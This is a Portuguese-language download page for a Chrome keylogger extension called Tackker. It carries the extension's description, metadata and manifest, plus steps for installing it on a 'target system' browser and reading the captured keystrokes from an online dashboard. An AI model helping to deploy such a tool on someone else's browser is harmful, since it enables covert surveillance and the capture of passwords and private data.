Tackker - online keylogger tool

Tackker is online keylogger tool that helps you log the keystrokes and other user data.

O que é Tackker - online keylogger tool?

Tackker - online keylogger tool é uma extensão do Chrome desenvolvida por https://tackker.com, e sua principal característica é "Tackker is online keylogger tool that helps you log the keystrokes and other user data.".

Capturas de Tela da Extensão

screenshot
screenshot
screenshot
screenshot

Baixar o arquivo CRX da Extensão Tackker - online keylogger tool

Baixe arquivos de extensão Tackker - online keylogger tool no formato crx, instale manualmente as extensões do Chrome no navegador ou compartilhe os arquivos crx com amigos para instalar facilmente as extensões do Chrome.

Instruções de Uso da Extensão

                        tackker is online keylogger tool that helps you log the keystrokes and other user data. It can be used for child monitoring as well as employee monitoring.
Tackker collects your click stream browsing activity - anonymously, for the purpose of analyzing and ensuring the keylogger is running smoothly.

tackker have made browser activity monitoring so easy. Monitor any browser activity by following these simple steps:

1) Install tackker on target system browser(s).
2) After installation, you will be directed to register/login (this part is important since without registering you can not see the logged data).
3) Once you are registered and the plugin is installed , simply monitor user activity from our online dashboard.                    

Informações Básicas da Extensão

Nome Tackker - online keylogger tool Tackker - online keylogger tool
ID ekpkdmohpdnebfedjjfklhpefgpgaaji
URL Oficial https://chromewebstore.google.com/detail/tackker-online-keylogger/ekpkdmohpdnebfedjjfklhpefgpgaaji
Descrição Tackker is online keylogger tool that helps you log the keystrokes and other user data.
Tamanho do Arquivo 161 KB
Contagem de Instalações 20,000
Versão Atual 1.3
Última Atualização 2023-10-06
Data de Publicação 2020-10-01
Classificação 4.03/5 Total de 37 Avaliações
Desenvolvedor https://tackker.com
Email [email protected]
Tipo de Pagamento free
Site da Extensão https://www.tackker.com
Idiomas Suportados en-US
manifest.json
{
    "update_url": "https:\/\/clients2.google.com\/service\/update2\/crx",
    "manifest_version": 3,
    "name": "Tackker - online keylogger tool",
    "description": "Tackker is online keylogger tool that helps you log the keystrokes and other user data.",
    "version": "1.3",
    "icons": {
        "128": "tackker-keylogger128.png",
        "48": "tackker-keylogger48.png",
        "16": "tackker-keylogger16.png"
    },
    "action": [],
    "background": {
        "service_worker": "back.js",
        "type": "module"
    },
    "content_scripts": [
        {
            "matches": [
                ""
            ],
            "js": [
                "jquery-3.5.0.min.js",
                "content.js"
            ]
        }
    ],
    "permissions": [
        "alarms",
        "tabs",
        "webRequest",
        "webNavigation",
        "scripting",
        "storage",
        "unlimitedStorage"
    ]
}